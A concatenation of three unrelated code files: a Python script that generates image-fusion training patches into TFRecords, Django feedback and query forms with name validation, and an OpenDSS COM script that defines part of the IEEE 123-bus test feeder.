    # bg_kernel = kernel_sizes[np.random.randint(0, 3)]
    fg_kernel = kernel_sizes[0]
    bg_kernel = kernel_sizes[0]
    fg_alpha = fg*alpha
    # Background Blur
    bg_blur = bg
    for i in range(bg_blur_times):
        bg_blur = cv.GaussianBlur(
            bg_blur, (bg_kernel, bg_kernel), (bg_kernel-1)/3)
    bg_blur_alpha = bg_blur*(1-alpha)
    result1 = fg_alpha + bg_blur_alpha
    result1 = np.clip(result1, 0, 255)
    # Foreground Blur (matte blurred in lockstep so the blend stays valid)
    fg_alpha_blur = fg_alpha
    alpha_blur = alpha
    for i in range(fg_blur_times):
        fg_alpha_blur = cv.GaussianBlur(
            fg_alpha_blur, (fg_kernel, fg_kernel), (fg_kernel-1)/3)
        alpha_blur = cv.GaussianBlur(
            alpha_blur, (fg_kernel, fg_kernel), (fg_kernel-1)/3)
    result2 = fg_alpha_blur*(alpha_blur) + bg*(1-alpha_blur)
    result2 = np.clip(result2, 0, 255)
    return result1.astype(np.uint8), result2.astype(np.uint8), alpha_blur
def get_grid_bbox(img_shape, grid_size, patch_size):
    """Split the valid patch-anchor area of an image into a grid of bbox
    cells, each shifted by half a patch so the boxes mark patch centres.

    Returns [] when the grid cannot fit the image with the given patch size.
    """
    # The image must host the grid once patch margins are removed
    if (img_shape[0] - patch_size[0] - grid_size[0] + 1) < 0 \
            or (img_shape[1] - patch_size[1] - grid_size[1] + 1) < 0:
        return []

    def axis_coords(extent, patch_len, cells):
        # Evenly spaced cell boundaries along one axis; last boundary is the
        # full valid extent so rounding slack lands in the final cell.
        valid = extent - patch_len + 1
        step = valid // cells
        return [k * step for k in range(cells)] + [valid]

    rows = axis_coords(img_shape[0], patch_size[0], grid_size[0])
    cols = axis_coords(img_shape[1], patch_size[1], grid_size[1])
    cells = [
        bbox([rows[i], cols[j]], [rows[i + 1] - 1, cols[j + 1] - 1])
        for i in range(grid_size[0])
        for j in range(grid_size[1])
    ]
    # Move every cell from top-left-anchor space to patch-centre space
    offset = (patch_size[0] // 2 - 1, patch_size[1] // 2 - 1)
    return [cell.shift(offset) for cell in cells]
def get_high_variance_patch(img, patch_size, quantity=1, grid_size=(20, 20)):
    """Sample `quantity` patch boxes centred on edge pixels of `img`.

    Builds a grid of candidate cells, keeps only cells whose Canny edge map
    contains at least one edge pixel, then anchors each patch on a randomly
    chosen edge pixel.  Returns [] when the grid does not fit or no cell
    contains an edge.
    """
    edges_map = cv.Canny(img, 30, 90, apertureSize=7)
    grids = get_grid_bbox(img.shape, grid_size, patch_size)
    # Keep only grid cells with at least one edge response
    grad_grids = []
    for g in grids:
        tmp_crop = g.get_crop(edges_map)
        if tmp_crop.max() > 0:
            grad_grids.append(g)
    patches = []
    if len(grad_grids) > 0:
        for i in range(quantity):
            # Pick a random edgy cell, then a random edge pixel inside it
            tmp_grid = grad_grids[np.random.randint(len(grad_grids))]
            tmp_crop = tmp_grid.get_crop(edges_map)
            y_s, x_s = np.where(tmp_crop > 0)
            tmp_point = np.random.randint(len(y_s))
            y, x = y_s[tmp_point], x_s[tmp_point]
            # Translate cell-local coordinates back to image coordinates
            y = y + tmp_grid.lt[0]
            x = x + tmp_grid.lt[1]
            # Box centred on (y, x); may extend past the image border —
            # callers rely on bbox.is_val/get_crop to reject such boxes
            lt = (y - patch_size[0] // 2 + 1, x - patch_size[1] // 2 + 1)
            rb = (lt[0] + patch_size[0] - 1, lt[1] + patch_size[1] - 1)
            patches.append(bbox(lt, rb))
    return patches
def get_random_patch(img, patch_size, quantity=1):
    """Draw `quantity` uniformly random patch boxes fully inside `img`."""
    boxes = []
    for _ in range(quantity):
        # Top-left corner chosen so the whole patch fits in the image
        top = np.random.randint(img.shape[0] - patch_size[0] + 1)
        left = np.random.randint(img.shape[1] - patch_size[1] + 1)
        bottom_right = (top + patch_size[0] - 1, left + patch_size[1] - 1)
        boxes.append(bbox((top, left), bottom_right))
    return boxes
# TFRecords
def _bytes_feature(value):
    """Wrap one raw byte string in a tf.train.Feature."""
    byte_list = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=byte_list)
def _int64_feature(value):
    """Wrap one integer in a tf.train.Feature."""
    int_list = tf.train.Int64List(value=[value])
    return tf.train.Feature(int64_list=int_list)
def _float32_feature(value):
    """Wrap an iterable of floats in a tf.train.Feature (no extra nesting)."""
    float_list = tf.train.FloatList(value=value)
    return tf.train.Feature(float_list=float_list)
def writeTFRecord(tfrWriter, p1, p2, label):
    """Serialize one training triple and append it to a TFRecord writer.

    p1, p2, label are numpy arrays; their raw bytes are stored under the
    keys 'p1', 'p2' and 'label' (shapes must agree with parseDataset, which
    expects 320x320x1 float32).
    """
    # BUG FIX: ndarray.tostring() is deprecated since NumPy 1.19 and removed
    # in NumPy 2.0 — tobytes() is the identical replacement.
    str1 = p1.tobytes()
    str2 = p2.tobytes()
    str3 = label.tobytes()
    # Create features
    tf_features = tf.train.Features(feature={'p1': _bytes_feature(
        str1), 'p2': _bytes_feature(str2), 'label': _bytes_feature(str3)})
    # Create Example
    tf_example = tf.train.Example(features=tf_features)
    tfrWriter.write(tf_example.SerializeToString())
def parseDataset(example_proto):
    """Parse one serialized Example back into 320x320x1 float32 tensors.

    Inverse of writeTFRecord: each field is stored as the raw float32 bytes
    of a 320x320 patch under the keys 'p1', 'p2' and 'label'.
    """
    feature_spec = {
        'p1': tf.io.FixedLenFeature(shape=(), dtype=tf.string),
        'p2': tf.io.FixedLenFeature(shape=(), dtype=tf.string),
        'label': tf.io.FixedLenFeature(shape=(), dtype=tf.string)
    }
    parsed = tf.io.parse_single_example(example_proto, feature_spec)
    # Decode and reshape every field the same way
    for key in ('p1', 'p2', 'label'):
        decoded = tf.io.decode_raw(parsed[key], tf.float32)
        parsed[key] = tf.reshape(decoded, (320, 320, 1))
    return parsed
if __name__ == '__main__':
    # Data-generation pipeline: composite random foreground/background pairs,
    # crop edge-centred patches at three scales, and stream them into a
    # TFRecord file for training.
    parser = argparse.ArgumentParser(description='')
    parser.add_argument(
        '--fg_dir', dest='fg_dir', type=str, default='fg',
        help='directory of the foreground images')
    parser.add_argument(
        '--bg_dir', dest='bg_dir', type=str, default='bg',
        help='directory of the background images')
    parser.add_argument(
        '--alpha_dir', dest='alpha_dir', type=str, default='alpha',
        help='directory of the alpha matting (ground truth)')
    parser.add_argument('--output', dest='output', type=str,
                        default='train.tfrecords',
                        help='file of processed data')
    parser.add_argument('--num', dest='num', type=int,
                        default='100000',
                        help='quantity of data')
    args = parser.parse_args()
    print(args)
    fg_dir = args.fg_dir
    bg_dir = args.bg_dir
    alpha_dir = args.alpha_dir
    image_num = int(args.num)
    tfrecord_path = path.join('.', args.output)
    writer = tf.io.TFRecordWriter(tfrecord_path)
    # Pre-load every foreground and its alpha matte (matched by filename)
    fg_names = listdir(fg_dir)
    fg_imgs = []
    alpha_imgs = []
    for fg_name in fg_names:
        fg_path = path.join(fg_dir, fg_name)
        alpha_path = path.join(alpha_dir, fg_name)
        fg = cv.imread(fg_path, cv.IMREAD_GRAYSCALE)
        fg_imgs.append(fg)
        alpha_imgs.append(cv.imread(alpha_path, cv.IMREAD_GRAYSCALE))
    bgs = listdir(bg_dir)
    for i in range(image_num):
        # Fresh random background every iteration (read from disk each time)
        bg_name = bgs[np.random.randint(len(bgs))]
        bg_path = path.join(bg_dir, bg_name)
        bg = cv.imread(bg_path, cv.IMREAD_GRAYSCALE)
        print(f"{i}/{image_num}", f"{i/image_num*100:.2}%", end='\r')
        # Read fg Image paths
        rand_fg = np.random.randint(0, len(fg_imgs))
        fg = fg_imgs[rand_fg]
        alpha = alpha_imgs[rand_fg]
        # FG rotation (random angle in [-10, 10) degrees)
        fg, alpha = rotate_Fg_Alpha(fg, alpha, np.random.rand()*20-10)
        # FG too small: upscale so both sides exceed 340 px (room for 320 crops)
        if fg.shape[0] <= 340 or fg.shape[1] <= 340:
            r = min(fg.shape[0] / 340, fg.shape[1] / 340)
            new_shape = (
                math.ceil(fg.shape[1] / r),
                math.ceil(fg.shape[0] / r))
            fg = cv.resize(
                fg, new_shape, fx=1 / r, fy=1 / r,
                interpolation=cv.INTER_CUBIC)
            alpha = cv.resize(
                alpha, new_shape, fx=1 / r, fy=1 / r,
                interpolation=cv.INTER_CUBIC)
        # Composition: scale bg so it covers the fg, then crop to fg size
        wratio = fg.shape[1] / bg.shape[1]
        hratio = fg.shape[0] / bg.shape[0]
        ratio = wratio if wratio > hratio else hratio
        bg_size = (math.ceil(bg.shape[1]*ratio),
                   math.ceil(bg.shape[0]*ratio))
        bg = cv.resize(bg, bg_size, fx=ratio, fy=ratio,
                       interpolation=cv.INTER_CUBIC)
        n_alpha = alpha / 255.0
        r1, r2, alpha_blur = compose(
            fg, bg[:fg.shape[0], :fg.shape[1]], n_alpha)
        n_r1 = r1 / 255.0
        n_r2 = r2 / 255.0
        # Ground-truth matte refined by a guided filter on the fused image
        imgf_gray = n_r1 * n_alpha + n_r2 * (1-n_alpha)
        guided = guided_filter(imgf_gray, n_alpha, 8, 0.1)
        guided = np.clip(guided, 0, 1)
        # Randomly crop patches with size 320, 480, 640
        lt320 = get_high_variance_patch(alpha, (320, 320), 1)
        lt480 = get_high_variance_patch(alpha, (480, 480), 1)
        lt640 = get_high_variance_patch(alpha, (640, 640), 1)
        lts = []
        if len(lt320) > 0:
            lts.append({'scale': 0, 'lt': lt320})
        if len(lt480) > 0:
            lts.append({'scale': 1, 'lt': lt480})
        if len(lt640) > 0:
            lts.append({'scale': 2, 'lt': lt640})
        if len(lts) == 0:
            # No edge-centred patch at any scale: fall back to a uniform crop
            lts.append(
                {'scale': 0, 'lt': get_random_patch(alpha, (320, 320))})
        # Create Training Patches (one randomly chosen scale per image)
        rand_int = np.random.randint(len(lts))
        training_patches = []
        if lts[rand_int]['scale'] == 0:
            # Crop 320x320
            # 1. Choose range, 2. Randomly flip
            lt320 = lts[rand_int]['lt']
            for p in lt320:
                p.random_shift(guided.shape, 10)  # random shift
                c1 = p.get_crop(n_r1)
                c2 = p.get_crop(n_r2)
                gt = p.get_crop(guided)
                if np.random.rand() > 0.5:
                    c1 = c1[:, ::-1]
                    c2 = c2[:, ::-1]
                    gt = gt[:, ::-1]
                if np.random.rand() > 0.5:
                    c1 = c1[::-1, :]
                    c2 = c2[::-1, :]
                    gt = gt[::-1, :]
                if np.random.rand() > 0.5:
                    # Swap the two inputs and invert the matte to match
                    tmp = c1
                    c1 = c2
                    c2 = tmp
                    gt = np.abs(1.0 - gt)
                training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
        elif lts[rand_int]['scale'] == 1:
            # Crop 480x480
            # 1. Choose range, 2. Resize to 320x320, 3. Randomly flip
            lt480 = lts[rand_int]['lt']
            for p in lt480:
                p.random_shift(guided.shape, 15)  # random shift
                tmp = 2.0/3.0
                c1 = p.get_crop(n_r1)
                c2 = p.get_crop(n_r2)
                gt = p.get_crop(guided)
                c1 = np.clip(cv.resize(c1, (320, 320), fx=tmp, fy=tmp,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                c2 = np.clip(cv.resize(c2, (320, 320), fx=tmp, fy=tmp,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                gt = np.clip(cv.resize(gt, (320, 320), fx=tmp, fy=tmp,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                if np.random.rand() > 0.5:
                    c1 = c1[:, ::-1]
                    c2 = c2[:, ::-1]
                    gt = gt[:, ::-1]
                if np.random.rand() > 0.5:
                    c1 = c1[::-1, :]
                    c2 = c2[::-1, :]
                    gt = gt[::-1, :]
                if np.random.rand() > 0.5:
                    # Swap the two inputs and invert the matte to match
                    tmp = c1
                    c1 = c2
                    c2 = tmp
                    gt = np.abs(1.0 - gt)
                training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
        else:
            # Crop 640x640
            # 1. Choose range, 2. Resize to 320x320, 3. Randomly flip
            lt640 = lts[rand_int]['lt']
            for p in lt640:
                p.random_shift(guided.shape, 20)  # random shift
                c1 = p.get_crop(n_r1)
                c2 = p.get_crop(n_r2)
                gt = p.get_crop(guided)
                c1 = np.clip(cv.resize(c1, (320, 320), fx=0.5, fy=0.5,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                c2 = np.clip(cv.resize(c2, (320, 320), fx=0.5, fy=0.5,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                gt = np.clip(cv.resize(gt, (320, 320), fx=0.5, fy=0.5,
                                       interpolation=cv.INTER_CUBIC), 0, 1)
                if np.random.rand() > 0.5:
                    c1 = c1[:, ::-1]
                    c2 = c2[:, ::-1]
                    gt = gt[:, ::-1]
                if np.random.rand() > 0.5:
                    c1 = c1[::-1, :]
                    c2 = c2[::-1, :]
                    gt = gt[::-1, :]
                if np.random.rand() > 0.5:
                    # Swap the two inputs and invert the matte to match
                    tmp = c1
                    c1 = c2
                    c2 = tmp
                    gt = np.abs(1.0 - gt)
                training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
        # write training data into tfrecords file
        for patches in training_patches:
            # Patches clipped at image borders come back with a wrong shape
            # (or from a None crop) — only exact 320x320 triples are written
            if patches['c1'].shape == (
                    320, 320) and patches['c2'].shape == (
                    320, 320) and patches['gt'].shape == (
                    320, 320):
                patches['c1'] = patches['c1'].reshape((320, 320, 1))
                patches['c2'] = patches['c2'].reshape((320, 320, 1))
                patches['gt'] = patches['gt'].reshape((320, 320, 1))
                # Inputs are rescaled back to [0, 255]; gt stays in [0, 1]
                patches['c1'] = patches['c1']*255.0
                patches['c2'] = patches['c2']*255.0
                writeTFRecord(
                    writer, patches['c1'].astype(np.float32),
                    patches['c2'].astype(np.float32),
                    patches['gt'].astype(np.float32))
            else:
                print("Shape Error!")
    writer.close()
|
from django.forms import (
ModelForm, Textarea, Form, IntegerField
)
from django.core.exceptions import ValidationError
from .models import (
Query, Feedback
)
import re
EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE = re.compile('^[a-z][a-z, ]*$', re.IGNORECASE)
class TrackingForm(Form):
    """Form asking the user for the tracking id issued at query submission."""
    tracking_id = IntegerField(
        label='Tracking Id',
        required=True,
        error_messages={'required': 'Please enter your Tracking Id'})

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        hint = "Please enter the tracking id which you recieved during query submission."
        self.fields['tracking_id'].widget.attrs['placeholder'] = hint
class FeedbackForm(ModelForm):
    """ModelForm collecting user feedback, with placeholder text on every
    field and letters-plus-space validation on the optional name fields."""

    class Meta:
        model = Feedback
        fields = ['first_name',
                  'last_name',
                  'email',
                  'phone_number', 'feedback']
        widgets = {
            'feedback': Textarea(attrs={'cols': 80, 'rows': 10}),
        }
        exclude = ('user',)
        help_texts = {
            'first_name': '50 characters or fewer. Letters only.',
            'last_name': '50 characters or fewer. Letters only.',
            'email': '',
            'feedback': 'Required.',
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        placeholders = {
            'email': "example@domain.com",
            'first_name': "Enter First Name",
            'last_name': "Enter Last Name",
            'phone_number': "Enter Your Phone Number",
            'feedback': "Please Enter Your feedback we will sincerly appreciate your concern.",
        }
        for field_name, text in placeholders.items():
            self.fields[field_name].widget.attrs['placeholder'] = text

    def clean_first_name(self):
        """Empty values pass through; otherwise letters and spaces only."""
        first_name = self.cleaned_data.get("first_name")
        if first_name and not EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(first_name):
            raise ValidationError("no special character allowed in First Name except space.")
        return first_name

    def clean_last_name(self):
        """Empty values pass through; otherwise letters and spaces only."""
        last_name = self.cleaned_data.get("last_name")
        if last_name and not EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(last_name):
            raise ValidationError("no special character allowed in Last Name except space.")
        return last_name
class QueryForm(ModelForm):
    """ModelForm for submitting a support query.

    Mirrors FeedbackForm: placeholder text on every field and
    letters-plus-space validation on the name fields.
    """

    class Meta:
        model = Query
        fields = ['first_name',
                  'last_name',
                  'email',
                  'phone_number', 'subject', 'query']
        widgets = {
            'query': Textarea(attrs={'cols': 80, 'rows': 10}),
        }
        exclude = ('user',)
        help_texts = {'subject': 'Required. 100 characters or fewer. Letters, digits and @/./+/-/_ only.',
                      'first_name': 'Required. 50 characters or fewer. Letters only.',
                      'last_name': 'Required. 50 characters or fewer. Letters only.',
                      'email': 'Required.',
                      'query': 'Required.',
                      }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['email'].widget.attrs['placeholder'] = "example@domain.com"
        self.fields['first_name'].widget.attrs['placeholder'] = "Enter First Name"
        self.fields['last_name'].widget.attrs['placeholder'] = "Enter Last Name"
        self.fields['subject'].widget.attrs['placeholder'] = "Enter Your Subject"
        self.fields['phone_number'].widget.attrs['placeholder'] = "Enter Your Phone Number"
        self.fields['query'].widget.attrs['placeholder'] = "Please Enter Your Query or Queries we will try our best to help you."

    def clean_first_name(self):
        """Validate first_name: letters and spaces only when present."""
        first_name = self.cleaned_data.get("first_name")
        # BUG FIX: guard against None/empty before .match() — cleaned_data.get
        # returns None when the field failed earlier validation, which made
        # .match(None) raise TypeError.  FeedbackForm already guards this way.
        if not first_name or EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(first_name):
            return first_name
        raise ValidationError("no special character allowed in First Name except space.")

    def clean_last_name(self):
        """Validate last_name the same way as clean_first_name."""
        last_name = self.cleaned_data.get("last_name")
        # Same None/empty guard as clean_first_name
        if not last_name or EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(last_name):
            return last_name
        raise ValidationError("no special character allowed in Last Name except space.")
|
import win32com.client
# ****************************************************
# * Initialize OpenDSS
# ****************************************************
# Instantiate the OpenDSS COM automation object
try:
    DSSObj = win32com.client.Dispatch("OpenDSSEngine.DSS")
except Exception:
    # BUG FIX: narrowed from a bare `except:` so SystemExit and
    # KeyboardInterrupt are no longer swallowed while the COM dispatch
    # failure (pywintypes.com_error, an Exception subclass) is still caught.
    print("Unable to start the OpenDSS Engine")
    raise SystemExit
# Set up the Text, Circuit, and Solution Interfaces
DSSText = DSSObj.Text
DSSCircuit = DSSObj.ActiveCircuit
DSSSolution = DSSCircuit.Solution
# ! Annotated Master file for the IEEE 123-bus test case.
# !
# ! This file is meant to be invoked from the Compile command in the "Run_IEEE123Bus.DSS" file.
# !
# ! Note: DSS commands, property names, etc., are NOT case sensitive. Capitalize as you please.
# ! You should always do a "Clear" before making a new circuit:
DSSText.Command = "Clear"
DSSText.Command = "Set DefaultBaseFrequency=60"
# ! INSTANTIATE A NEW CIRCUIT AND DEFINE A STIFF 4160V SOURCE
# ! The new circuit is called "ieee123"
# ! This creates a Vsource object connected to "sourcebus". This is now the active circuit element, so
# ! you can simply continue to edit its property value.
# ! The basekV is redefined to 4.16 kV. The bus name is changed to "150" to match one of the buses in the test feeder.
# ! The source is set for 1.0 per unit and the Short circuit impedance is set to a small value (0.0001 ohms)
# ! The ~ is just shorthad for "more" for the New or Edit commands
DSSText.Command = "New object=circuit.ieee123"
DSSText.Command = "~ basekv=4.16 Bus1=150 pu=1.00 R1=0 X1=0.0001 R0=0 X0=0.0001"
# ! 3-PHASE GANGED REGULATOR AT HEAD OF FEEDER (KERSTING ASSUMES NO IMPEDANCE IN THE REGULATOR)
# ! the first line defines the 3-phase transformer to be controlled by the regulator control.
# ! The 2nd line defines the properties of the regulator control according to the test case
DSSText.Command = "new transformer.reg1a phases=3 windings=2 buses=[150 150r] conns=[wye wye] kvs=[4.16 4.16] kvas=[5000 5000] XHL=.001 %LoadLoss=0.00001 ppm=0.0"
DSSText.Command = "new regcontrol.creg1a transformer=reg1a winding=2 vreg=120 band=2 ptratio=20 ctprim=700 R=3 X=7.5"
# ! REDIRECT INPUT STREAM TO FILE CONTAINING DEFINITIONS OF LINECODES
# ! This file defines the line impedances is a similar manner to the description in the test case.
DSSText.Command = "Redirect IEEELineCodes.DSS"
# ! LINE DEFINITIONS
# ! Lines are defined by referring to a "linecode" that contains the impedances per unit length
# ! So the only properties required are the LineCode name and Length. Units are assumed to match the definition
# ! since no units property is defined in either the Linecodes file or this file.
# ! Note that it is not necessary to explicitly specify the node connections for the 3-phase lines
# ! unless they are not ".1.2.3". However, they are spelled out here for clarity.
# ! The DSS assumes .1.2.3.0.0 ... for connections of 3 or more phases.
# ! Likewise, .1 is not necessary for 1-phase lines connected to phase 1. However, if it is connected
# ! to any other phase, it must be specified. For completeness, everything is spelled out here.
# !
# ! Note that it is recommended that the "units=" property be used here and in the Linecode definition as well
# ! to avoid confusion in the future
#
# ! *** Original *** New Line.L115 Phases=3 Bus1=149.1.2.3 Bus2=1.1.2.3 LineCode=1 Length=0.4
# ! Since the default is 3-phase, the definition of this line can be simpler:
#
DSSText.Command = "New Line.L115 Bus1=149 Bus2=1 LineCode=1 Length=0.4 units=kft"
DSSText.Command = "New Line.L1 Phases=1 Bus1=1.2 Bus2=2.2 LineCode=10 Length=0.175 units=kft"
DSSText.Command = "New Line.L2 Phases=1 Bus1=1.3 Bus2=3.3 LineCode=11 Length=0.25 units=kft"
DSSText.Command = "New Line.L3 Phases=3 Bus1=1.1.2.3 Bus2=7.1.2.3 LineCode=1 Length=0.3 units=kft"
DSSText.Command = "New Line.L4 Phases=1 Bus1=3.3 Bus2=4.3 LineCode=11 Length=0.2 units=kft"
DSSText.Command = "New Line.L5 Phases=1 Bus1=3.3 Bus2=5.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L6 Phases=1 Bus1=5.3 Bus2=6.3 LineCode=11 Length=0.25 units=kft"
DSSText.Command = "New Line.L7 Phases=3 Bus1=7.1.2.3 Bus2=8.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L8 Phases=1 Bus1=8.2 Bus2=12.2 LineCode=10 Length=0.225 units=kft"
DSSText.Command = "New Line.L9 Phases=1 Bus1=8.1 Bus2=9.1 LineCode=9 Length=0.225 units=kft"
DSSText.Command = "New Line.L10 Phases=3 Bus1=8.1.2.3 Bus2=13.1.2.3 LineCode=1 Length=0.3 units=kft"
DSSText.Command = "New Line.L11 Phases=1 Bus1=9r.1 Bus2=14.1 LineCode=9 Length=0.425 units=kft"
DSSText.Command = "New Line.L12 Phases=1 Bus1=13.3 Bus2=34.3 LineCode=11 Length=0.15 units=kft"
DSSText.Command = "New Line.L13 Phases=3 Bus1=13.1.2.3 Bus2=18.1.2.3 LineCode=2 Length=0.825 units=kft"
DSSText.Command = "New Line.L14 Phases=1 Bus1=14.1 Bus2=11.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L15 Phases=1 Bus1=14.1 Bus2=10.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L16 Phases=1 Bus1=15.3 Bus2=16.3 LineCode=11 Length=0.375 units=kft"
DSSText.Command = "New Line.L17 Phases=1 Bus1=15.3 Bus2=17.3 LineCode=11 Length=0.35 units=kft"
DSSText.Command = "New Line.L18 Phases=1 Bus1=18.1 Bus2=19.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L19 Phases=3 Bus1=18.1.2.3 Bus2=21.1.2.3 LineCode=2 Length=0.3 units=kft"
DSSText.Command = "New Line.L20 Phases=1 Bus1=19.1 Bus2=20.1 LineCode=9 Length=0.325 units=kft"
DSSText.Command = "New Line.L21 Phases=1 Bus1=21.2 Bus2=22.2 LineCode=10 Length=0.525 units=kft"
DSSText.Command = "New Line.L22 Phases=3 Bus1=21.1.2.3 Bus2=23.1.2.3 LineCode=2 Length=0.25 units=kft"
DSSText.Command = "New Line.L23 Phases=1 Bus1=23.3 Bus2=24.3 LineCode=11 Length=0.55 units=kft"
DSSText.Command = "New Line.L24 Phases=3 Bus1=23.1.2.3 Bus2=25.1.2.3 LineCode=2 Length=0.275 units=kft"
DSSText.Command = "New Line.L25 Phases=2 Bus1=25r.1.3 Bus2=26.1.3 LineCode=7 Length=0.35 units=kft"
DSSText.Command = "New Line.L26 Phases=3 Bus1=25.1.2.3 Bus2=28.1.2.3 LineCode=2 Length=0.2 units=kft"
DSSText.Command = "New Line.L27 Phases=2 Bus1=26.1.3 Bus2=27.1.3 LineCode=7 Length=0.275 units=kft"
DSSText.Command = "New Line.L28 Phases=1 Bus1=26.3 Bus2=31.3 LineCode=11 Length=0.225 units=kft"
DSSText.Command = "New Line.L29 Phases=1 Bus1=27.1 Bus2=33.1 LineCode=9 Length=0.5 units=kft"
DSSText.Command = "New Line.L30 Phases=3 Bus1=28.1.2.3 Bus2=29.1.2.3 LineCode=2 Length=0.3 units=kft"
DSSText.Command = "New Line.L31 Phases=3 Bus1=29.1.2.3 Bus2=30.1.2.3 LineCode=2 Length=0.35 units=kft"
DSSText.Command = "New Line.L32 Phases=3 Bus1=30.1.2.3 Bus2=250.1.2.3 LineCode=2 Length=0.2 units=kft"
DSSText.Command = "New Line.L33 Phases=1 Bus1=31.3 Bus2=32.3 LineCode=11 Length=0.3 units=kft"
DSSText.Command = "New Line.L34 Phases=1 Bus1=34.3 Bus2=15.3 LineCode=11 Length=0.1 units=kft"
DSSText.Command = "New Line.L35 Phases=2 Bus1=35.1.2 Bus2=36.1.2 LineCode=8 Length=0.65 units=kft"
DSSText.Command = "New Line.L36 Phases=3 Bus1=35.1.2.3 Bus2=40.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L37 Phases=1 Bus1=36.1 Bus2=37.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L38 Phases=1 Bus1=36.2 Bus2=38.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L39 Phases=1 Bus1=38.2 Bus2=39.2 LineCode=10 Length=0.325 units=kft"
DSSText.Command = "New Line.L40 Phases=1 Bus1=40.3 Bus2=41.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L41 Phases=3 Bus1=40.1.2.3 Bus2=42.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L42 Phases=1 Bus1=42.2 Bus2=43.2 LineCode=10 Length=0.5 units=kft"
DSSText.Command = "New Line.L43 Phases=3 Bus1=42.1.2.3 Bus2=44.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L44 Phases=1 Bus1=44.1 Bus2=45.1 LineCode=9 Length=0.2 units=kft"
DSSText.Command = "New Line.L45 Phases=3 Bus1=44.1.2.3 Bus2=47.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L46 Phases=1 Bus1=45.1 Bus2=46.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L47 Phases=3 Bus1=47.1.2.3 Bus2=48.1.2.3 LineCode=4 Length=0.15 units=kft"
DSSText.Command = "New Line.L48 Phases=3 Bus1=47.1.2.3 Bus2=49.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L49 Phases=3 Bus1=49.1.2.3 Bus2=50.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L50 Phases=3 Bus1=50.1.2.3 Bus2=51.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L51 Phases=3 Bus1=51.1.2.3 Bus2=151.1.2.3 LineCode=4 Length=0.5 units=kft"
DSSText.Command = "New Line.L52 Phases=3 Bus1=52.1.2.3 Bus2=53.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L53 Phases=3 Bus1=53.1.2.3 Bus2=54.1.2.3 LineCode=1 Length=0.125 units=kft"
DSSText.Command = "New Line.L54 Phases=3 Bus1=54.1.2.3 Bus2=55.1.2.3 LineCode=1 Length=0.275 units=kft"
DSSText.Command = "New Line.L55 Phases=3 Bus1=54.1.2.3 Bus2=57.1.2.3 LineCode=3 Length=0.35 units=kft"
DSSText.Command = "New Line.L56 Phases=3 Bus1=55.1.2.3 Bus2=56.1.2.3 LineCode=1 Length=0.275 units=kft"
DSSText.Command = "New Line.L57 Phases=1 Bus1=57.2 Bus2=58.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L58 Phases=3 Bus1=57.1.2.3 Bus2=60.1.2.3 LineCode=3 Length=0.75 units=kft"
DSSText.Command = "New Line.L59 Phases=1 Bus1=58.2 Bus2=59.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L60 Phases=3 Bus1=60.1.2.3 Bus2=61.1.2.3 LineCode=5 Length=0.55 units=kft"
DSSText.Command = "New Line.L61 Phases=3 Bus1=60.1.2.3 Bus2=62.1.2.3 LineCode=12 Length=0.25 units=kft"
DSSText.Command = "New Line.L62 Phases=3 Bus1=62.1.2.3 Bus2=63.1.2.3 LineCode=12 Length=0.175 units=kft"
DSSText.Command = "New Line.L63 Phases=3 Bus1=63.1.2.3 Bus2=64.1.2.3 LineCode=12 Length=0.35 units=kft"
DSSText.Command = "New Line.L64 Phases=3 Bus1=64.1.2.3 Bus2=65.1.2.3 LineCode=12 Length=0.425 units=kft"
DSSText.Command = "New Line.L65 Phases=3 Bus1=65.1.2.3 Bus2=66.1.2.3 LineCode=12 Length=0.325 units=kft"
DSSText.Command = "New Line.L66 Phases=1 Bus1=67.1 Bus2=68.1 LineCode=9 Length=0.2 units=kft"
DSSText.Command = "New Line.L67 Phases=3 Bus1=67.1.2.3 Bus2=72.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L68 Phases=3 Bus1=67.1.2.3 Bus2=97.1.2.3 LineCode=3 Length=0.25 units=kft"
DSSText.Command = "New Line.L69 Phases=1 Bus1=68.1 Bus2=69.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L70 Phases=1 Bus1=69.1 Bus2=70.1 LineCode=9 Length=0.325 units=kft"
